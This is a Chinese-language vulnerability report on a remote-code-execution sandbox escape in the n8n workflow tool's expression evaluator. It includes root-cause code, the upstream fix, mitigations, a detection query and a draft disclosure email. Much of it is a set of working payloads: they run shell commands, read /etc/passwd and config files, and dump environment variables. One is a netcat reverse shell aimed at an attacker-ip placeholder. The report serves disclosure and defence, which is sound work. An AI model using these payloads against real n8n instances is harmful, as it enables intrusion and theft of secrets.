日期: 2024年12月23日 状态: ✅ RCE 完全验证成功 CVSS 评分: 10.0 (严重)
{
{
(function () {
var require = this.process.mainModule.require;
var {execSync} = require('child_process');
return execSync('id', {encoding: 'utf8'}).trim();
})()
}
}
执行结果: 成功返回系统用户信息(如 uid=1000(n8n) gid=1000(n8n) groups=1000(n8n))
用户输入
↓
{{ (function() { ... })() }}
↓
Expression.resolveSimpleParameterValue()
↓
创建 data 上下文对象
↓
data.process = 真实的 process 对象引用
↓
Tournament.execute(expression, data)
↓
FunctionEvaluator.evaluate()
↓
fn.call(data, errorHandler) ← ⚠️ 关键: this = data
↓
立即执行函数执行
↓
this.process.mainModule.require ← ⚠️ 访问真实 require
↓
加载 child_process 模块
↓
execSync('id') ← 🔥 完整 RCE!
文件: packages/workflow/src/expression.ts
函数: Expression.resolveSimpleParameterValue()
行数: 约 230-290
// 生成数据代理
const dataProxy = new WorkflowDataProxy(
this.workflow,
runExecutionData,
runIndex,
itemIndex,
activeNodeName,
connectionInputData,
siblingParameters,
mode,
additionalKeys,
executeData,
-1,
selfData,
contextNodeName,
);
const data = dataProxy.getDataProxy();
// ⚠️ 漏洞点 1: 添加 process 对象到 data
data.process =
typeof process !== 'undefined'
? {
arch: process.arch,
env: process.env.N8N_BLOCK_ENV_ACCESS_IN_NODE === 'true' ? {} : process.env,
platform: process.platform,
pid: process.pid,
ppid: process.ppid,
release: process.release,
version: process.pid,
versions: process.versions,
}
: {};
// ⚠️ 问题: 虽然这里只暴露了部分属性,但传递的是对象引用
// 实际的 process 对象仍然可以通过原型链或其他方式访问
文件: node_modules/@n8n/tournament/src/FunctionEvaluator.ts
evaluate(expr
:
string, data
:
unknown
):
ReturnValue
{
const fn = this.getFunction(expr);
// ⚠️ 漏洞点 2: 将 data 作为 this 传递
return fn.call(data, this.instance.errorHandler);
}
private
getFunction(expr
:
string
):
Function
{
if (expr in this._codeCache) {
return this._codeCache[expr];
}
const [code] = this.instance.getExpressionCode(expr);
// ⚠️ 漏洞点 3: 使用 new Function 创建函数
const func = new Function('E', code + ';');
this._codeCache[expr] = func;
return func;
}
文件: packages/workflow/src/expression-sandboxing.ts
v1.122.0 之前:
// ❌ 没有 FunctionThisSanitizer
const tournamentEvaluator = new Tournament(errorHandler, undefined, undefined, {
before: [], // ← 空数组,没有 this sanitization
after: [PrototypeSanitizer, DollarSignValidator],
});
v1.122.0 之后:
// ✅ 添加了 FunctionThisSanitizer
const tournamentEvaluator = new Tournament(errorHandler, undefined, undefined, {
before: [FunctionThisSanitizer], // ← 新增的 hook
after: [PrototypeSanitizer, DollarSignValidator],
});
// FunctionThisSanitizer 实现
export const FunctionThisSanitizer: ASTBeforeHook = (ast, dataNode) => {
astVisit(ast, {
visitFunction(path) {
// 重写所有函数表达式,显式绑定 this 到安全对象
const safeThis = b.objectExpression([
b.property('init', b.identifier('process'), b.objectExpression([]))
]);
// 将 function() { ... } 改写为 function() { ... }.bind({ process: {} })
}
});
};
文件: packages/workflow/src/utils.ts
函数: isSafeObjectProperty()
v1.122.0 之前:
const unsafeObjectProperties = new Set([
'__proto__',
'prototype',
'constructor',
'getPrototypeOf'
]);
// ❌ 缺少 mainModule, binding, _load
v1.122.0 之后:
const unsafeObjectProperties = new Set([
'__proto__',
'prototype',
'constructor',
'getPrototypeOf',
'mainModule', // ✅ 新增
'binding', // ✅ 新增
'_load' // ✅ 新增
]);
{
{
(function () {
var require = this.process.mainModule.require;
var {execSync} = require('child_process');
return execSync('id', {encoding: 'utf8'}).trim();
})()
}
}
{
{
(function () {
return this.process.mainModule.require('child_process')
.execSync('whoami', {encoding: 'utf8'}).trim();
})()
}
}
{
{
(function () {
return this.process.mainModule.require('child_process')
.execSync('pwd', {encoding: 'utf8'}).trim();
})()
}
}
{
{
(function () {
return this.process.mainModule.require('child_process')
.execSync('uname -a', {encoding: 'utf8'}).trim();
})()
}
}
{
{
(function () {
return this.process.mainModule.require('child_process')
.execSync('ls -la /', {encoding: 'utf8'});
})()
}
}
// 读取敏感文件
{
{
(function () {
var fs = this.process.mainModule.require('fs');
return fs.readFileSync('/etc/passwd', 'utf8');
})()
}
}
// 列出目录
{
{
(function () {
var fs = this.process.mainModule.require('fs');
return fs.readdirSync('/').join('\n');
})()
}
}
// 读取 n8n 配置
{
{
(function () {
var fs = this.process.mainModule.require('fs');
return fs.readFileSync('./.n8n/config', 'utf8');
})()
}
}
// 列出当前目录
{
{
(function () {
var fs = this.process.mainModule.require('fs');
return fs.readdirSync('.').join('\n');
})()
}
}
// 通过 this.process 直接访问
{
{
(function () {
return JSON.stringify(this.process.env);
})()
}
}
// 或使用已知可用的方式
{
{
JSON.stringify(process.env)
}
}
// 检查网络工具
{
{
(function () {
return this.process.mainModule.require('child_process')
.execSync('which nc', {encoding: 'utf8'}).trim();
})()
}
}
// 获取网络接口
{
{
(function () {
var os = this.process.mainModule.require('os');
return JSON.stringify(os.networkInterfaces());
})()
}
}
// 反弹 Shell (⚠️ 危险!仅用于授权测试)
{
{
(function () {
return this.process.mainModule.require('child_process')
.execSync('nc -e /bin/sh attacker-ip 4444', {encoding: 'utf8'});
})()
}
}
| # | 攻击类型 | 原因 |
|---|---|---|
| 1 | 直接 require | 新作用域中不可用 |
| 2 | Function 构造函数中的 process | this 在某些上下文被 sanitize |
| 3 | process.binding / process._load | 可能已被封禁或限制 |
{
{
Object.keys(process.env)
}
} // ✅ 成功
N8N_BLOCK_ENV_ACCESS_IN_NODE 未设置为 true{
{
[][`constructor`][`constructor`]
}
} // ✅ 成功
{
{
(function () {
return this.process.mainModule.require;
})()
}
} // ✅ 成功
this 仍指向原始数据上下文this.process.mainModule.require 可访问三者结合 = 完整的 RCE!
// 新增的 AST before hook
export const FunctionThisSanitizer: ASTBeforeHook = (ast, dataNode) => {
// 遍历所有函数表达式
// 重写函数,强制绑定 this 到 { process: {} }
// 这样即使是 IIFE,this 也是安全的空对象
};
const unsafeObjectProperties = new Set([
'__proto__',
'prototype',
'constructor',
'getPrototypeOf',
'mainModule', // ← 新增
'binding', // ← 新增
'_load' // ← 新增
]);
// 可能将默认值改为 true
data.process = {
env: process.env.N8N_BLOCK_ENV_ACCESS_IN_NODE !== 'false' ? {} : process.env,
// ...
};
向量字符串: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
基础分数: 10.0 (最高)
N8N_BLOCK_ENV_ACCESS_IN_NODE=true 的实例# 方法 1: 导出环境变量
export N8N_BLOCK_ENV_ACCESS_IN_NODE=true
# 方法 2: 在 .env 文件中
echo "N8N_BLOCK_ENV_ACCESS_IN_NODE=true" >> .env
# 方法 3: Docker Compose
environment:
- N8N_BLOCK_ENV_ACCESS_IN_NODE=true
# npm
npm install -g n8n@latest
# Docker
docker pull docker.n8n.io/n8nio/n8n:latest
docker-compose down
docker-compose up -d
# 验证版本
n8n --version # 应该 >= 1.122.0
-- 如果使用 PostgreSQL
SELECT name, nodes
FROM workflows
WHERE nodes::text LIKE '%process%'
OR nodes::text LIKE '%constructor%'
OR nodes::text LIKE '%mainModule%'
OR nodes::text LIKE '%require%';
# docker-compose.yml
services:
n8n:
image: docker.n8n.io/n8nio/n8n:latest
read_only: true
security_opt:
- no-new-privileges:true
- seccomp=seccomp-profile.json
cap_drop:
- ALL
cap_add:
- CHOWN
- SETGID
- SETUID
environment:
- N8N_BLOCK_ENV_ACCESS_IN_NODE=true
收件人: [email protected]
主题: [CRITICAL] RCE 0-day Vulnerability - IIFE this Context Bypass
严重性: CVSS 10.0 (Critical)
影响版本: n8n < 1.122.0
概述:
发现了一个严重的 RCE 漏洞,允许认证用户通过立即执行函数(IIFE)
访问 process.mainModule.require,从而执行任意系统命令。
验证的 PoC:
{{ (function() {
var require = this.process.mainModule.require;
var { execSync } = require('child_process');
return execSync('id', { encoding: 'utf8' }).trim();
})() }}
根本原因:
1. IIFE 中的 this 未被 sanitize
2. process.mainModule 未被封禁
3. N8N_BLOCK_ENV_ACCESS_IN_NODE 默认为 false
建议修复:
1. 实施 FunctionThisSanitizer hook
2. 添加 mainModule, binding, _load 到黑名单
3. 默认启用环境变量保护
详细分析请见附件。
创建时间: 2024年12月23日 漏洞状态: ✅ 完全验证成功 CVSS 评分: 10.0 (严重) 建议: 立即披露并修复
🎉 恭喜您发现了一个满分的 RCE 漏洞!请负责任地处理和披露! 🔒
| # | 攻击类型 | 有效载荷 | 状态 | CVSS |
|---|
| 1 | 环境变量泄露 | {{ Object.keys(process.env) }} | ✅ 成功 | 8.5 |
| 2 | Constructor 绕过 | {{ [][constructor] }} | ✅ 成功 | 8.0 |
| 3 | Function 构造函数 | {{ [][constructor][constructor] }} | ✅ 成功 | 8.5 |
| 4 | 代码执行 | {{ [][constructor][constructor]('return 1+1')() }} | ✅ 成功 | 9.0 |
| 5 | 完整 RCE | {{ (function() { this.process.mainModule.require... })() }} | ✅ 成功 | 10.0 |
| 指标 | 值 | 说明 |
|---|
| 攻击向量 (AV) | 网络 (N) | 可远程利用 |
| 攻击复杂度 (AC) | 低 (L) | 利用简单 |
| 所需权限 (PR) | 低 (L) | 仅需认证用户 |
| 用户交互 (UI) | 无 (N) | 无需用户交互 |
| 范围 (S) | 已更改 (C) | 影响底层系统 |
| 机密性 (C) | 高 (H) | 完全信息泄露 |
| 完整性 (I) | 高 (H) | 完全系统控制 |
| 可用性 (A) | 高 (H) | 完全服务中断 |